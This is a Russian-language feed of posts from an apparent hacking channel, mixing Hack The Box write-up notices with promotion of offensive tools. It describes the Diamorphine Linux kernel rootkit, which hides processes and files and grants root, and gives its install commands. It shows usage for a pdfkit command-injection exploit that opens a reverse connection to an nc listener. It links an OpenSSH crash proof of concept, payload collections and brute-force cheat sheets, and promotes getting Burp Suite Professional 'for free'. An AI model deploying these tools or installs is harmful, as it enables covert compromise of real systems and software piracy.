CVE-2023-25136 Proof-of-Concept
DoS-доказательство концепции двойного освобождения OpenSSH 9.1p1 CVE-2023-25136.
Это вызовет двойное освобождение и приведет к аварийному завершению

Подробнее: https://github.com/jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free
#CVE

Diamorphine — это руткит LKM для ядер Linux 2.6.x/3.x/4.x/5.x и ARM64.

Функции:
🪄При загрузке модуль запускается невидимым;
🪄Скрыть/показать любой процесс, отправив сигнал 31;
🪄Отправка сигнала 63 (любому pid) делает модуль (не)видимым;
🪄Отправка сигнала 64 (любому pid) делает данного пользователя root;
🪄Файлы или каталоги, начинающиеся с MAGIC_PREFIX, становятся невидимыми;

Установка:

git clone https://github.com/m0nad/Diamorphine
cd Diamorphine
make
insmod diamorphine.ko (от рута)

Подробнее: https://github.com/m0nad/Diamorphine
#софт

☠️Использование Wifite на практике☠️
Читать: https://teletype.in/@hackerblog/nPZ9xy8f2TO
#софт #литература

💉Слепая SQL инъекция простыми словами на примере💉

Читать: https://teletype.in/@hackerblog/7onak0Dpwyi

#литература #полезные_материалы

🎫Payloads на все случаи жизни🎫

Наконец-то не придется самому что-то придумывать🤷🏻‍♂️

Подробнее: https://github.com/swisskyrepo/PayloadsAllTheThings

#полезные_материалы #литература

💉Получен root для тачки Inject💉
Райтап постараюсь сделать сегодня
#hack_the_box #новости

Кстати, HTB запустила "Сезон открытого бета-тестирования"
Это что-то типо соревнований с рейтингом, который набирается за взлом тачек
За каждое звание от Bronze до Holo в конце сезона, который длится 3 месяца, выдаются свои плюшки
Сюда я буду выкатывать райтапы некоторых из этих тачек, поэтому вы также сможете получить призы😉
#новости #hack_the_box

💉Райтап на тачку Inject💉

Читать: https://teletype.in/@hackerblog/1mllvEhUJhW

#райтап #hack_the_box

Privileger
Privileger позволяет вам максимально просто работать с привилегиями в ОС Windows. Присутствуют следующие режимы:
◽️Добавить привилегии аккаунту.
◽️Запустить процесс, добавив в его токен конкретную привилегию.
◽️Удалить у пользователя привилегию.
◽️Режим поиска. Позволяет обнаруживать на конкретном компьютере объекты, обладающие какой-либо привилегией.
◽️Перечислить все привилегии, которые назначены конкретному аккаунту.

Подробнее: https://github.com/MzHmO/Privileger

#софт

PDFkit-CMD-Injection (CVE-2022-25765)

Эксплойт для внедрения команды CVE-2022-25765 в pdfkit < 0.8.6

Использование:
nc -lvnp 1337
./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337

Флаги:
-t, --target Адрес цели в http-формате
-a, --addr Адрес для обратного соединения
-p, --port Порт для обратного соединения (9001 стандартно)

Подробнее: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
#CVE

Шпаргалка по XSS☠️
#полезные_материалы #литература

Принятие законопроекта о "белых хакерах" в России, предлагающего ввести понятие bug bounty в правовое поле и изменения в Уголовный кодекс, может быть отложено из-за недовольства ФСБ и ФСТЭК. Силовые ведомства выступают против либерализации положений УК и высказали соответствующую позицию на рабочих совещаниях по законопроекту.

#белыехакеры #bugbounty #Уголовныйкодекс #ФСБ #ФСТЭК

🦊Как установить Burp Suite Professional на Kali Linux бесплатно и использовать свой любимый браузер для работы с ним с помощью FoxyProxy🦊

Читать: https://teletype.in/@hackerblog/OPJvU17aAxW
Ссылка на репозиторий: https://github.com/SNGWN/Burp-Suite
#софт #полезные_материалы

Получен рут на тачке Socket📍

Райтап на днях
#новости #hack_the_box

🔌Райтап на тачку Socket🔌

Читать: https://teletype.in/@hackerblog/ZuRc3detP9z

#hack_the_box #райтап

❓Логические атаки: виды и примеры❓
Читать: https://teletype.in/@hackerblog/-vloA4MZQTj
#полезные_материалы #литература

🦄Шпаргалка по использованию Hydra для разных служб🦄

Читать: https://github.com/frizb/Hydra-Cheatsheet
#литература #полезные_материалы